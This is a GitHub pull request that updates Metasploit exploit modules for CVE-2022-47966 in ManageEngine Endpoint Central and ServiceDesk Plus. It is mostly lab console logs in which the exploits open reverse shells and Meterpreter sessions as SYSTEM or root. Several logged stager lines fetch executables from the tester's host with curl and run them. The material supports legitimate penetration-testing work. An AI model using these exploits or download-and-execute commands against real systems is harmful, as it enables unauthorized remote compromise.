Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 #18796

Merged
merged 5 commits into from Mar 4, 2024
Merged

Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 #18796

merged 5 commits into from Mar 4, 2024

Conversation

errorxyz
Copy link
Contributor

@errorxyz errorxyz commented Feb 6, 2024
edited

Related to #17641
Continuation of #18515

Changes

  1. Add java target for manageengine endpoint central cve-2022-47966
  2. Change default payload for windows command target on both endpoint_central and servicedesk_plus
  3. Minor changes to manageengine service desk plus cve-2022-47966 to use random variables in initial payload

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966
  • Verify the thing does what it should
  • Verify the thing does not do what it should not

Example Usage - Endpoint Central on Windows Server 2019 - target java

Setup link

msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > options

Module options (exploit/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                           yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8020                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                       listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.2.1      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > set rhosts 192.168.2.135
rhosts => 192.168.2.135
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > run

[*] Started reverse TCP handler on 192.168.2.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Java (in-memory) for java/shell_reverse_tcp
[*] Using URL: http://192.168.2.1:8080/qQmwOSGlwBx/
[*] Command shell session 1 opened (192.168.2.1:4444 -> 192.168.2.135:49885) at 2024-02-06 22:44:12 +0530
[*] Exploit completed.
[*] Server stopped.


Shell Banner:
Microsoft Windows [Version 10.0.17763.3650]
(c) 2018 Microsoft Corporation. All rights reserved.
-----
          

C:\Program Files\DesktopCentral_Server\bin>whoami
whoami
nt authority\system

C:\Program Files\DesktopCentral_Server\bin>exit  
exit
[*] 192.168.2.135 - Command shell session 1 closed.

@errorxyz
Copy link
Contributor Author

errorxyz commented Feb 6, 2024
edited

Verification for manageengine servicedesk plus on linux

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > options

Module options (exploit/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966):

   Name       Current Setting       Required  Description
   ----       ---------------       --------  -----------
   DELAY      5                     yes       Number of seconds to wait between each request
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      8080                  yes       The target port (TCP)
   SSL        false                 no        Negotiate SSL/TLS for outgoing connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /SamlResponseServlet  yes       The SAML endpoint URL
   URIPATH                          no        The URI to use for this exploit (default is random)
   VHOST                            no        HTTP server virtual host


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to
                                       listen on all addresses.
   SRVPORT  5000             yes       The local port to listen on.


Payload options (java/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  127.0.0.1        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Java (in-memory)



View the full module info with the info, or info -d command.

msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > run

[!] You are binding to a loopback address by setting LHOST to 127.0.0.1. Did you want ReverseListenerBindAddress?
[*] Started reverse TCP handler on 127.0.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://127.0.0.1:5000/I6J29gqq8O/
[*] Command shell session 2 opened (127.0.0.1:4444 -> 127.0.0.1:42432) at 2024-02-06 23:58:20 +0530
[*] Exploit completed.
[*] Server stopped.

whoami
errorxyz

@errorxyz errorxyz marked this pull request as ready for review February 6, 2024 18:34
@errorxyz errorxyz mentioned this pull request Feb 8, 2024
Open
@cdelafuente-r7 cdelafuente-r7 self-assigned this Feb 9, 2024
cdelafuente-r7
cdelafuente-r7 reviewed Feb 13, 2024
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks for updating this @errorxyz. I left a few other comments and suggestions after testing.

These also apply to the modules/exploits/multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966.rb module, but I wasn't able to add the review inline. Note that for this module, I found an issue that prevented the Unix Command target to work and it has been fixed here. You should rebase your branch to bring this fix and have this module work with this target.

modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb Outdated Show resolved Hide resolved
modules/exploits/windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966.rb Outdated Show resolved Hide resolved
@errorxyz errorxyz changed the title Add java target for ManageEngine Endpoint Central CVE-2022-47966 ~Add java target for ManageEngine Endpoint Central CVE-2022-47966~ Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 Feb 22, 2024
@errorxyz errorxyz changed the title ~Add java target for ManageEngine Endpoint Central CVE-2022-47966~ Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 Enhance ManageEngine Endpoint Central and ServiceDesk Plus CVE-2022-47966 Feb 22, 2024
@errorxyz errorxyz mentioned this pull request Feb 22, 2024
Open
@cdelafuente-r7
Copy link
Contributor

Thank you for updating this @errorxyz. It looks good to me now. I tested both modules against Linux and Windows and verified I got a session each time. I'll go ahead and land it. Thank you again for your contribution.

Note that, as I commented above, I'll update the default Java payload to java/meterpreter/reverse_tcp.

Example output

ManageEngine ServiceDesk Plus

Target 0 (Java) on Linux 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload payload/java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/bEsYSoQclAd/
[*] GET /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /bEsYSoQclAd/metasploit.dat requested
[+] Sending 200
[*] GET /bEsYSoQclAd/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending 200
[*] GET /bEsYSoQclAd/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.30
[*] Meterpreter session 12 opened (192.168.120.1:4444 -> 192.168.120.30:55088) at 2024-03-04 18:37:31 +0100
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu22
OS              : Linux 6.2.0-33-generic (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/linux
Target 0 (Java) on Windows 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/4bBoom9/
[*] GET /4bBoom9/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /4bBoom9/metasploit.dat requested
[+] Sending 200
[*] GET /4bBoom9/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /4bBoom9/metasploit/Payload.class requested
[+] Sending 200
[*] GET /4bBoom9/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.41
[*] Meterpreter session 13 opened (192.168.120.1:4444 -> 192.168.120.41:49793) at 2024-03-04 19:15:03 +0100
[*] Server stopped.

meterpreter > getuid
Server username: WIN2019$
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
Target 1 (Windows EXE Dropper) 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAA[...SNIP...]
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.120.41
[*] Meterpreter session 6 opened (192.168.120.1:4444 -> 192.168.120.41:49861) at 2024-03-04 18:27:36 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 2 (Windows Command) 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/windows/https/x64/meterpreter/reverse_tcp
payload => cmd/windows/https/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.41 lhost=192.168.120.1

[*] Command to run on remote host: curl -sko %TEMP%\UGkJQNKCL.exe https://192.168.120.1:8080/sgPmScU7zjtTGqTaXTbkKg & start /B %TEMP%\UGkJQNKCL.exe
[*] Fetch handler listening on 192.168.120.1:8080
[*] HTTPS server started
[*] Adding resource /sgPmScU7zjtTGqTaXTbkKg
[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Client 192.168.120.41 requested /sgPmScU7zjtTGqTaXTbkKg
[*] Sending payload to 192.168.120.41 (curl/7.83.1)
[*] Sending stage (201798 bytes) to 192.168.120.41
[*] Meterpreter session 7 opened (192.168.120.1:4444 -> 192.168.120.41:49873) at 2024-03-04 18:29:18 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 3 (Unix Command) 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload cmd/unix/python/meterpreter/reverse_tcp
payload => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Sending stage (24772 bytes) to 192.168.120.30
[*] Meterpreter session 4 opened (192.168.120.1:4444 -> 192.168.120.30:44628) at 2024-03-04 18:18:52 +0100

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : ubuntu22
OS              : Linux 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep  7 10:33:52 UTC 2
Architecture    : x64
System Language : en_US
Meterpreter     : python/linux
Target 4 (Linux Dropper) 
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/manageengine_servicedesk_plus_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.30 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Using URL: http://192.168.120.1:8080/0phg5I/
[*] Generated command stager: ["curl -so /tmp/soURUDTJ http://192.168.120.1:8080/0phg5I/;chmod +x /tmp/soURUDTJ;/tmp/soURUDTJ;rm -f /tmp/soURUDTJ"]
[*] Client 192.168.120.30 requested /0phg5I/
[*] Sending payload to 192.168.120.30
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.120.30
[*] Meterpreter session 5 opened (192.168.120.1:4444 -> 192.168.120.30:48208) at 2024-03-04 18:20:07 +0100
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Server stopped.

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.120.30
OS           : Ubuntu 22.04 (Linux 6.2.0-33-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

ManageEngine Endpoint Central

Target 0 (Java) on Windows 
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Java (in-memory) for java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.120.1:8080/fu5ix37ufFOc/
[*] GET /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending the main payload class
[*] HEAD /fu5ix37ufFOc/metasploit.dat requested
[+] Sending 200
[*] GET /fu5ix37ufFOc/metasploit.dat requested
[+] Sending the payload configuration data
[*] HEAD /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending 200
[*] GET /fu5ix37ufFOc/metasploit/Payload.class requested
[+] Sending the main payload class
[*] Sending stage (57971 bytes) to 192.168.120.46
[*] Meterpreter session 14 opened (192.168.120.1:4444 -> 192.168.120.46:49918) at 2024-03-04 19:42:34 +0100
[*] Server stopped.

meterpreter > getuid
Server username: WIN2019$
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 10.0 (amd64)
Architecture    : x64
System Language : en_US
Meterpreter     : java/windows
Target 1 (Windows EXE Dropper) 
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows EXE Dropper for windows/x64/meterpreter/reverse_tcp
[*] Generated command stager: ["echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...SNIP...]
[*] Command Stager progress -  17.01% done (2046/12025 bytes)
[*] Command Stager progress -  34.03% done (4092/12025 bytes)
[*] Command Stager progress -  51.04% done (6138/12025 bytes)
[*] Command Stager progress -  68.06% done (8184/12025 bytes)
[*] Command Stager progress -  84.24% done (10130/12025 bytes)
[*] Sending stage (201798 bytes) to 192.168.120.46
[*] Meterpreter session 15 opened (192.168.120.1:4444 -> 192.168.120.46:50020) at 2024-03-04 19:47:51 +0100
[*] Command Stager progress - 100.00% done (12025/12025 bytes)

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
Target 2 (Windows Command) 
msf6 exploit(windows/http/manageengine_endpoint_central_saml_rce_cve_2022_47966) > exploit verbose=true rhosts=192.168.120.46 lhost=192.168.120.1

[*] Command to run on remote host: curl -sko %TEMP%\DONwHGcIdx.exe https://192.168.120.1:8080/sgPmScU7zjtTGqTaXTbkKg & start /B %TEMP%\DONwHGcIdx.exe
[*] Fetch handler listening on 192.168.120.1:8080
[*] HTTPS server started
[*] Adding resource /sgPmScU7zjtTGqTaXTbkKg
[*] Started reverse TCP handler on 192.168.120.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated. SAML-based SSO is enabled.
[*] Executing Windows Command for cmd/windows/https/x64/meterpreter/reverse_tcp
[*] Client 192.168.120.46 requested /sgPmScU7zjtTGqTaXTbkKg
[*] Sending payload to 192.168.120.46 (curl/7.83.1)
[*] Sending stage (201798 bytes) to 192.168.120.46
[*] Meterpreter session 16 opened (192.168.120.1:4444 -> 192.168.120.46:50539) at 2024-03-04 20:17:41 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN2019
OS              : Windows Server 2019 (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows

@cdelafuente-r7 cdelafuente-r7 added the rn-enhancement release notes enhancement label Mar 4, 2024
cdelafuente-r7 added a commit that referenced this pull request Mar 4, 2024
@cdelafuente-r7
Land #18796, Enhance ManageEngine Endpoint Central and ServiceDesk Plus
1e8e6d3 
CVE-2022-47966
@cdelafuente-r7 cdelafuente-r7 merged commit 97513d4 into rapid7:master Mar 4, 2024
35 checks passed
@cdelafuente-r7
Copy link
Contributor

Release Notes

This updates the ManageEngine Endpoint Central and ServiceDesk Plus RCE modules for CVE-2022-47966. Particularly, it adds a Java target to be able to use Java-based payloads.

@errorxyz errorxyz deleted the manageengine branch March 14, 2024 20:14
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 left review comments

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
enhancement rn-enhancement release notes enhancement
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@errorxyz @cdelafuente-r7